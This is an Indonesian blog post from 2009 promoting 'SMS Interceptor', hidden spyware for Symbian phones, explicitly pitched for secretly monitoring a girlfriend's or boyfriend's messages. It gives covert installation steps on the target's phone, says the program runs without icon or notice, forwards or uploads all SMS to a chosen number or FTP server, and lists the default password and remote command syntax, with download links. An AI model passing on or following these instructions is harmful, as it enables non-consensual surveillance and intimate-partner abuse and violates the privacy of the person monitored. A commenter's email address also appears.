Wednesday, February 25, 2009

SMS Interceptor. Capture and forward your girlfriend or boyfriend SMS

Untuk mereka yang paranoid atau mulai merasa ada sesuatu yang tidak beres dengan sikap pacar dan ingin menyelidikinya, ini adalah salah satu cara hi-tech untuk menyelidikinya lewat sms yang keluar dan yang masuk. SMS interceptor adalah software yang dapat berjalan pada handphone dengan OS symbian, software ini akan berjalan secara otomatis ketika handphone dihidupkan, tidak memiliki GUI, tidak ada icon program, tidak menampilkan icon ketika program mengirimkan sms. Cara mengontrol program ini adalah secara jarak jauh dengan mengirim sms dengan format khusus yang tidak akan tampil sebagai sms pada handphone target.
SMS Interceptor memiliki 3 mode kerja.
A. Forwading Mode. Pada mode ini setiap sms masuk dan keluar dan akan dikirim ulang ke nomor yang sudah ditentukan sebelumnya.
B. Recording Mode. Merekam setiap sms masuk dan keluar dan menyimpannya sebagai file kedalam memori handphone. File tersebut bisa di upload melalui FTP server yang sudah ditentukan sebelumnya, anda harus memiliki akun FTP server dan GPRS handphone terget harus sudah aktif. Letak file sms log bisa di direktori system\apps\smsanywhere.
C. Forwarding and recording mode. Merupakan kombinasi dari mode A dan mode B yang akan banyak memakan resource CPU handphone. Tidak direkomendasikan untuk handphone lelet.
Petunjuk instalasi dan cara penggunaan.
Copy program ini ke handphone target (yang akan dimonitor) dengan menggunakan bluetooth, infrared, kabel data atau memori cardreader.
Eksekusi program untuk melakukan instalasi, ketika ditanya dimana menyimpan aplikasi ini pilih memori internal handphone agar walaupun si target mengganti sim card atau memori atau memformat memorinya program masih tetap bisa melakukan tugasnya.
Setelah sukses terinstall matikan handphone selama 1 menit kemudian hidupkan lagi. Anda sudah bisa melakukan kontrol terhadap handphone target dengan mengirimkan sms.

Format pengiriman sms adalah SA[password][spasi][aksi][parameter].
Default password adalah 12345678 untuk merubah password menjadi 88888888 kirim sms dengan format SA12345678 P88888888.
Untuk menentukan nomor forward sms (nomor kemana sms harus dikirim) kirim sms dengan format SA12345678 D+6281222333444

Download software disini
Download manualnya disini
Hati – hati jika mencabut memori eksternal handphone Norton mendeteksi beberapa file milik sms Interceptor sebagai virus SymbOS.Beselo.A. Jika karena sesuatu program menjadi tidak berjalan sebagaimana yang diharapkan tetapi masih terus terusan memforward sms ke nomor acak caranya bisa anda temukan disini.


2 komentar:

Anonymous said...

mas tau license nya enggak??
soalnya cuman bisa forward 5 sms aj nih

Anonymous said...

tolong email saya di nika.cutez@hotmail.com

Post a Comment

Please comment and get free dofollow backlink to your blog ^_^

Related Posts Plugin for WordPress, Blogger...
 
BLOGGER CIGUGUR Copyright © 2009 Blogger Template Designed by Bie Blogger Template